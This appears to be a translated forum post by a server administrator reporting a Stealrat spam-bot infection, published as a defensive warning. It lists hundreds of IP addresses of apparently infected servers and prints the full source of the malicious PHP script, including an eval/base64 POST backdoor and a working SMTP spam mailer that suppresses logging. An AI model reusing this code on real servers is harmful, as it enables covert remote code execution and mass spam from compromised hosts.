91.201.52.87312RuRussian Federation
77.222.40.53312RuRussian Federation
194.186.22.174300RuRussian Federation
83.169.19.196300DEGermanyH st
87.247.179.190300IRIran, Islamic Republic of
157.7.184.16300JPJapan
62.75.216.86300DEGermany
64.111.127.191300USUnited StatesBrea
54.199.128.26300JPJapanTokyo
212.83.148.67300FRFrance
109.72.95.12300NLNetherlands
54.236.216.241300USUnited StatesAshburn
46.4.61.212300DEGermany
118.69.204.202300VNVietnam
92.255.196.173300RuRussian FederationKazan
23.89.192.224300USUnited StatesHenderson
27.254.66.151300THThailand
85.13.150.116300DEGermany
81.201.49.9300CZCzech RepublicKladno
173.254.28.57300USUnited StatesProvo
144.76.154.81300DEGermany
66.115.174.137300USUnited StatesMarietta
212.15.115.19300RuRussian FederationMoscow
89.184.70.31300UAUkraineKiev
85.25.201.176300DEGermany
120.138.21.77300NzNew zealand
98.142.240.110300CACanadaBrampton
184.107.154.82300CACanadaMontr al
159.253.144.76300NLNetherlands
109.202.13.114288RuRussian FederationTomsk
178.172.148.221288BYBelarus
164.177.151.209288GBUnited kingdom
198.154.248.248288USUnited StatesHouston
75.125.253.18288USUnited StatesHouston
190.153.188.6288CLChileSantiago
78.47.94.128288DEGermany
54.250.184.233288JPJapanTokyo
183.81.164.218288MyMalaysia
176.9.218.111288DEGermany
194.27.32.44288TRTurkeyMugla
185.4.75.69288EEEstonia
91.212.157.65288FRFrance
217.20.175.14288UAUkraine
64.90.57.231288USUnited StatesBrea
148.251.0.23288DEGermany
50.56.69.73288USUnited StatesSan antonio
188.165.229.9288FRFrance
46.252.16.11288DEGermany
178.63.68.203288DEGermany
82.98.139.8288ESSpain
212.67.217.28288GBUnited kingdom
87.118.90.207288DEGermany
91.239.66.97288PLPoland
78.46.220.108288DEGermany
85.13.138.19288DEGermany
195.62.70.239288RuRussian Federation
95.163.69.102288RuRussian Federation
129.121.177.180288USUnited StatesAlbuquerque
69.28.254.181288CACanadaMontr al
208.113.225.11288USUnited StatesBrea
202.181.172.147288HKHong Kong
103.1.186.252288AUAustraliaMarrickville
81.176.232.174287RuRussian Federation
80.247.79.182276ITItaly
83.216.181.139276ITItalyFiorano modenese
212.191.32.222276PLPolandLodz
194.190.67.126276RuRussian Federation
77.222.40.205276RuRussian Federation
77.222.56.208276RuRussian Federation
198.154.218.101276USUnited StatesHouston
23.253.211.174276USUnited StatesSan antonio
198.15.95.74276USUnited StatesTempe
82.98.169.87276ESSpain
199.89.53.36276USUnited States
89.184.69.2276UAUkraineKiev
133.242.205.125276JPJapanSakura
213.238.166.30276TRTurkey
5.187.1.232276DEGermanyFrankfurt
108.171.175.23276USUnited StatesSan antonio
203.176.183.45276IDIndonesiaBogor
212.224.118.220276DEGermany
176.67.240.92276RuRussian FederationNizhniy Novgorod
65.99.237.20276USUnited StatesSaint Louis
178.63.22.196276DEGermany
77.222.61.185276RuRussian Federation
95.213.136.66276RuRussian Federation
49.50.8.226276IDIndonesia
64.90.42.228276USUnited StatesBrea
195.204.17.84276NONorways
162.213.254.82276USUnited StatesLos angeles
62.75.142.113276DEGermany
173.203.81.168276USUnited StatesSan antonio
106.187.93.112276JPJapan
195.225.168.238276ITItaly
173.214.187.101276USUnited StatesEdmond
70.32.78.142276USUnited StatesCulver City
46.119.10.42276UAUkraine
129.121.176.183264USUnited StatesAlbuquerque
74.220.207.175264USUnited StatesProvo
184.107.198.106264CACanadaMontr al
106.51.252.22264INIndia
117.53.153.171264MyMalaysia
108.168.130.34264USUnited StatesDallas
77.222.40.26264RuRussian Federation
77.221.130.46264RuRussian Federation
87.106.18.135264DEGermany
88.80.213.62264DEGermanyH st
68.171.222.84264USUnited StatesSouthfield
81.176.226.164264RuRussian Federation
65.99.237.17264USUnited StatesSaint Louis
69.195.198.156264USUnited StatesMiami
216.194.8.46264USUnited StatesHarrison
67.205.20.94264USUnited StatesBrea
77.232.72.80264EUEurope
208.113.229.16264USUnited StatesBrea
193.239.4.84264DEGermany
174.140.212.122264USUnited StatesLas vegas
77.222.61.113264RuRussian Federation
77.92.143.166264TRTurkeySanayi
91.199.197.222264RuRussian Federation
89.31.103.105264NLNetherlands
77.120.106.25264UAUkraine
5.178.85.12264RuRussian Federation
83.169.19.228264DEGermanyH st
199.116.78.158264USUnited StatesTraverse city
91.218.230.119252RuRussian Federation
50.57.86.110252USUnited StatesSan antonio
212.72.171.211252DEGermany
92.61.157.40252EUEurope
37.59.3.134252FRFrance
88.198.40.196252DEGermanyN rnberg
74.50.2.123252USUnited StatesAnaheim
163.178.101.196252CRCosta ricaSan josu
77.222.40.65252RuRussian Federation
184.173.107.12252USUnited StatesHouston
81.169.131.15252DEGermanyBerlin
69.175.78.58252USUnited StatesChicago
77.222.40.221252RuRussian Federation
148.251.55.181252DEGermany
62.75.230.62252DEGermany
5.250.177.86252GBUnited kingdom
77.221.130.38252RuRussian Federation
142.4.29.17252USUnited StatesProvo
199.116.78.108252USUnited StatesTraverse city
178.208.131.106252RuRussian Federation
95.169.186.78252DEGermany
77.222.57.40240RuRussian Federation
8.29.131.195240USUnited StatesCincinnati
95.168.210.61240CZCzech Republic
188.165.250.82240FRFrance
188.120.241.11240RuRussian FederationMoscow
5.9.122.105240DEGermany
192.237.186.143240USUnited StatesSan antonio
46.183.250.13240NLNetherlands
77.222.40.44240RuRussian Federation
77.221.130.31240RuRussian Federation
5.9.147.234240DEGermany
82.146.37.81240RuRussian FederationIrkutsk
95.138.189.116240GBUnited kingdom
89.184.72.80240UAUkraineKiev
173.0.129.96240USUnited StatesOrlando
98.129.239.249228USUnited StatesSan antonio
174.136.12.69228USUnited StatesDurham
85.214.149.196228DEGermanyBerlin
88.208.250.12228GBUnited kingdomGloucester
5.9.150.76228DEGermany
200.124.138.52228CWCurcaoWillemstad
82.98.144.22228ESSpain
192.99.16.165228CACanadaMontr al
88.204.108.93228RuRussian FederationTomsk
62.99.220.220228ATAustria
203.123.187.186228INIndia
91.201.52.83228RuRussian Federation
153.122.9.192228JPJapanTokyo
77.87.193.193228UAUkraine
199.231.93.131228USUnited StatesNanuet
212.102.229.234228DEGermanyOberberg
193.106.95.104228RuRussian FederationMoscow
92.61.152.95228EUEurope
178.218.166.171228HRCroatia
217.243.238.50228DEGermany
188.225.36.197228RuRussian Federation
83.169.31.225228DEGermanyH st
144.76.200.117228DEGermany
176.58.122.8216GBUnited kingdom
195.149.225.171216PLPoland
31.31.196.47216RuRussian Federation
79.96.190.30216PLPoland
208.113.153.234216USUnited StatesBrea
5.79.29.126216GBUnited kingdom
103.11.74.136216IDIndonesia
198.100.45.29216USUnited States
37.9.169.12204SKSlovakia
82.207.52.82204UAUkraine
5.63.159.22204RuRussian Federation
46.28.64.150204UAUkraine
199.116.78.161204USUnited StatesTraverse city
195.210.46.110204KZKazakhstan
81.19.186.159204GBUnited kingdom
64.55.119.44204USUnited StatesRancho cordova
23.252.121.207204USUnited StatesLos angeles
69.41.236.53204USUnited StatesHouston
50.23.81.82204USUnited StatesSan jose
46.165.220.147204DEGermany
77.221.130.17204RuRussian Federation
37.59.10.29192FRFrance
193.17.204.52192DEGermany
216.120.250.101192USUnited StatesClifton park
162.209.99.196192USUnited StatesSan antonio
77.91.205.166192PTPortugal
81.25.126.23192ESSpain
207.58.145.53192USUnited StatesMclean
112.78.2.175192VNVietnam
207.228.63.37192USUnited StatesReno
195.158.234.59192RORomania
103.244.9.7192SGSingapore
85.214.144.114192DEGermanyBerlin
81.29.203.238192ITItaly
87.106.135.33192DEGermany
85.13.143.160180DEGermany
162.243.40.27180USUnited States
82.98.134.212180ESSpain
66.225.219.33180USUnited StatesChicago
46.33.115.219180CZCzech Republic
66.199.140.243180CACanadaToronto
112.78.6.239180VNVietnam
213.168.182.122180CZCzech RepublicMlada Boleslav
91.142.208.62168ESSpainBarcelona
68.171.219.98168USUnited StatesSouthfield
69.163.180.47168USUnited StatesBrea
176.9.33.44168DEGermany
5.9.107.11168DEGermany
95.76.161.151168RORomaniaBucharest
81.177.3.76168RuRussian Federation
77.232.68.46168EUEurope
37.140.192.17168RuRussian Federation
198.154.104.66168USUnited StatesDallas
85.13.130.230168DEGermany
49.50.8.193156IDIndonesia
5.9.141.74156DEGermany
70.85.33.34156USUnited StatesHouston
46.4.90.51156DEGermany
151.78.206.227156ITItaly
77.222.56.22156RuRussian Federation
37.140.192.60144RuRussian Federation
210.211.101.21144VNVietnamHanoi
88.198.158.190144DEGermany
198.57.163.213144USUnited StatesProvo
103.249.108.101144HKHong Kong
77.222.61.197144RuRussian Federation
85.214.240.160144DEGermanyBerlin
174.136.14.109132USUnited StatesDurham
98.129.249.134132USUnited StatesSan antonio
108.168.250.16132USUnited StatesDallas
64.34.157.180132USUnited StatesNew york
217.160.168.95132DEGermany
144.76.131.196132DEGermany
213.162.246.73132NONorway
162.144.36.171132USUnited StatesProvo
198.57.205.195132USUnited StatesProvo
208.113.185.93132USUnited StatesBrea
194.100.28.115132FIFinland
79.99.203.89120BEBelgium
82.98.134.217120ESSpain
134.0.113.79120RuRussian Federation
173.236.176.122120USUnited StatesBrea
92.53.126.190120RuRussian Federation
85.13.130.227120DEGermany
77.221.130.37120RuRussian Federation
64.202.107.85120USUnited StatesChicago
212.34.156.23120ESSpain
184.173.107.20108USUnited StatesHouston
46.161.1.139108RuRussian FederationSaint Petersburg
64.5.33.166108USUnited StatesHouston
212.85.116.109108PLPoland
5.63.159.66108RuRussian Federation
89.184.78.99108UAUkraineKiev
85.25.78.183108DEGermany
148.251.47.43108DEGermany
92.53.126.11896RuRussian Federation
92.53.125.17896RuRussian Federation
92.53.112.20296RuRussian Federation
92.53.125.15896RuRussian Federation
75.126.27.9096USUnited StatesDallas
77.222.40.18596RuRussian Federation
195.234.4.6096UAUkraine
78.108.80.1096RuRussian Federation
79.96.54.19096PLPoland
77.75.35.14096TRTurkey
85.13.150.6696DEGermany
93.93.64.20684ESSpain
37.140.192.16884RuRussian Federation
92.53.126.16484RuRussian Federation
108.168.250.1372USUnited StatesDallas
108.168.250.972USUnited StatesDallas
81.177.140.17172RuRussian Federation
92.53.113.3672RuRussian Federation
70.33.246.3072CACanadaOakville
188.93.144.8672NLNetherlands
70.33.246.4072CACanadaOakville
81.176.228.272RuRussian Federation
77.222.42.17660RuRussian Federation
92.53.114.5960RuRussian Federation
199.116.78.560USUnited StatesTraverse city
216.119.155.24660USUnited StatesAtlanta
176.57.209.9260RuRussian Federation
89.161.215.6060PLPoland
108.168.219.17360USUnited StatesDallas
99.198.109.20260USUnited StatesChicago
92.53.126.19360RuRussian Federation
2.81.128.21648PTPortugalgueda
176.57.210.3248RuRussian Federation
85.13.139.12548DEGermany
92.53.98.15648RuRussian Federation
85.214.149.3848DEGermanyBerlin
74.124.195.4548USUnited StatesLos angeles
81.177.139.5148RuRussian Federation
92.53.112.19448RuRussian Federation
198.178.116.24148CACanada
192.249.114.3248USUnited StatesLos angeles
92.53.126.7248RuRussian Federation
92.53.112.2148RuRussian Federation
173.254.28.6148USUnited StatesProvo
92.53.125.3048RuRussian Federation
81.176.66.24448RuRussian Federation
65.99.239.22748USUnited StatesSaint Louis
37.140.192.5648RuRussian Federation
37.140.192.8748RuRussian Federation
190.107.17.6636COColombiaPereira
92.53.114.24536RuRussian Federation
37.140.192.7136RuRussian Federation
37.140.192.22636RuRussian Federation
81.177.141.10136RuRussian Federation
37.140.192.12636RuRussian Federation
37.140.192.3236RuRussian Federation
81.177.6.636RuRussian Federation
205.234.140.23136USUnited StatesChicago
81.177.141.3236RuRussian Federation
92.53.118.2736RuRussian Federation
37.140.192.6336RuRussian Federation
92.53.125.19636RuRussian Federation
168.144.144.3636CACanadaToronto
69.175.71.5036USUnited StatesChicago
79.96.147.10036PLPoland
195.210.29.1136SKSlovakia
91.197.230.1236GBUnited kingdom
92.53.113.21636RuRussian Federation
81.177.139.18136RuRussian Federation
184.173.107.1736USUnited StatesHouston
212.113.145.19536GBUnited kingdom
184.173.107.836USUnited StatesHouston
31.31.196.3536RuRussian Federation
92.38.226.1436RuRussian Federation
92.53.98.19136RuRussian Federation
92.53.118.14036RuRussian Federation
207.58.154.2724USUnited StatesReston
77.222.61.16024RuRussian Federation
192.185.82.24724USUnited StatesHouston
46.4.126.10624DEGermany
81.177.141.17124RuRussian Federation
178.254.9.6524DEGermany
92.53.114.324RuRussian Federation
217.107.34.9124RuRussian Federation
37.140.192.12824RuRussian Federation
176.57.209.18024RuRussian Federation
92.53.96.16124RuRussian Federation
31.31.196.3924RuRussian Federation
176.9.7.14924DEGermany
79.170.44.10624GBUnited kingdom
81.177.141.20124RuRussian Federation
81.177.141.16124RuRussian Federation
37.140.192.10624RuRussian Federation
81.177.6.7224RuRussian Federation
81.177.141.22124RuRussian Federation
81.177.135.15124RuRussian Federation
176.57.210.3524RuRussian Federation
176.57.216.224RuRussian Federation
184.154.233.224USUnited StatesChicago
37.140.192.3624RuRussian Federation
76.74.242.20024USUnited StatesNew york
91.197.228.15024GBUnited kingdom
92.53.121.5624RuRussian Federation
81.177.140.7124RuRussian Federation
184.173.107.424USUnited StatesHouston
176.57.216.9024RuRussian Federation
198.57.247.20224USUnited StatesProvo
192.185.176.22524USUnited StatesHouston
176.57.209.6924RuRussian Federation
37.140.192.11024RuRussian Federation
50.87.144.4724USUnited StatesProvo
92.53.112.8224RuRussian Federation
92.53.98.15824RuRussian Federation
81.95.96.17824CZCzech RepublicPrague
69.90.162.10024CACanadaOakville
37.140.192.20224RuRussian Federation
37.140.192.924RuRussian Federation
69.25.136.25224USUnited StatesAtlanta
37.140.192.8024RuRussian Federation
92.53.96.22024RuRussian Federation
185.21.133.10124GBUnited kingdom
92.53.126.2212RuRussian Federation
72.47.209.12712USUnited StatesCulver City
81.177.139.2112RuRussian Federation
92.53.118.11712RuRussian Federation
192.185.83.11012USUnited StatesHouston
64.188.46.13612USUnited StatesChicago
92.53.96.4912RuRussian Federation
67.227.167.6812USUnited StatesLansing
92.53.121.6812RuRussian Federation
50.87.144.18912USUnited StatesProvo
50.87.144.3812USUnited StatesProvo
91.197.231.17512GBUnited kingdom
81.177.140.1112RuRussian Federation
92.127.158.2712RuRussian Federation
79.96.63.3812PLPoland
212.85.108.20512PLPoland
92.53.96.8912RuRussian Federation
81.177.140.12112RuRussian Federation
89.161.164.19412PLPoland
192.185.83.22712USUnited StatesHouston
81.177.139.21112RuRussian Federation
188.93.212.4412RuRussian Federation
37.140.192.1312RuRussian Federation
92.53.96.2912RuRussian Federation
176.57.209.13712RuRussian Federation
217.107.34.4112RuRussian Federation
176.57.209.4812RuRussian Federation
92.53.125.5412RuRussian Federation
92.53.125.20812RuRussian Federation
92.53.96.4712RuRussian Federation
195.234.4.5012UAUkraine
92.53.125.9012RuRussian Federation
81.177.140.6412RuRussian Federation
92.53.114.8512RuRussian Federation
91.106.203.8512RuRussian Federation
176.57.210.412RuRussian Federation
81.177.141.19112RuRussian Federation
192.185.83.16212USUnited StatesHouston
81.177.139.11112RuRussian Federation
81.177.141.21112RuRussian Federation
91.218.228.15412RuRussian Federation
70.33.241.14012USUnited StatesNew york
192.185.2.22112USUnited StatesHouston
193.183.99.17112ITItalyMilan
80.172.241.4412PTPortugal
37.140.192.23812RuRussian Federation
208.38.186.10012USUnited StatesNaperville
198.57.247.18212USUnited StatesProvo
81.177.140.22112RuRussian Federation
92.53.114.12312RuRussian Federation
213.183.63.312RuRussian FederationMoscow
85.89.105.3012RuRussian Federation
81.177.139.1112RuRussian Federation
192.163.206.14212USUnited StatesProvo
192.185.4.5912USUnited StatesCedar grove
81.177.135.12112RuRussian Federation
85.158.183.14112DEGermany
92.38.226.1312RuRussian Federation
92.53.96.24012RuRussian Federation
217.107.219.19112RuRussian Federation
173.255.225.1306USUnited StatesCollege station
IPHitsCountry codeCountry NameCity


Donut by country and number of hits


The source code of the malicious script (PHP code is built but the names of variables and functions remain unchanged)
<?php eval(base64_decode($_POST['n8743bb']));?> <?php @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); @ini_set('log_errors',0); if(count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $SomeGlobalVar = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $SomeGlobalVar = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($SomeGlobalVar) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; $v1e66f6b4 = 'ma'.chr(105).'l'; if (!in_array('m'.'a'.'il', $v619d75f8)) { if ($v10497e3f) { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } else { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } } $v4340fd73 = "Date: " . @date("D, j MYG:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { echo(chr(79).chr(75).md5(1234567890)."+1\n"); continue; } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n"; } } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>


Look at the list of IP addresses, perhaps the IP of your server in this list. If so, try to isolate the problem yourself. If you have a regular virtual hosting - write to your hoster that the neighbors have such an infection under the name Stealrat. We do not know what to do next, the problem is localized and the holes are all closed but the requests go all the time. The list of unique IP replenishes and replenishes. There is no load on the server, but the very knowledge of what is going on and in such numbers ... Who knows where to write and how to warn all owners of IP data. Maybe someone of you will tell.

We wrote a letter to trendmicro asking what to do with this list of IP addresses. Perhaps prompted and perhaps not. Perhaps there is some kind of service to which you can add infected IP or something similar.

Thank you for your attention, good luck, take care of your servers.

Update 1. Selection of all infected sites from logs (from the body of spam messages)
In the label domain and server IP. The list is unique by domains.
List (4705)

Update 2. Additional domain selection (hostname)
In the label domain and server IP. The list is unique by domains.
Many thanks to xaker1 for the list provided.
List of (1223)

Source: https://habr.com/ru/post/221871/

More articles:


All Articles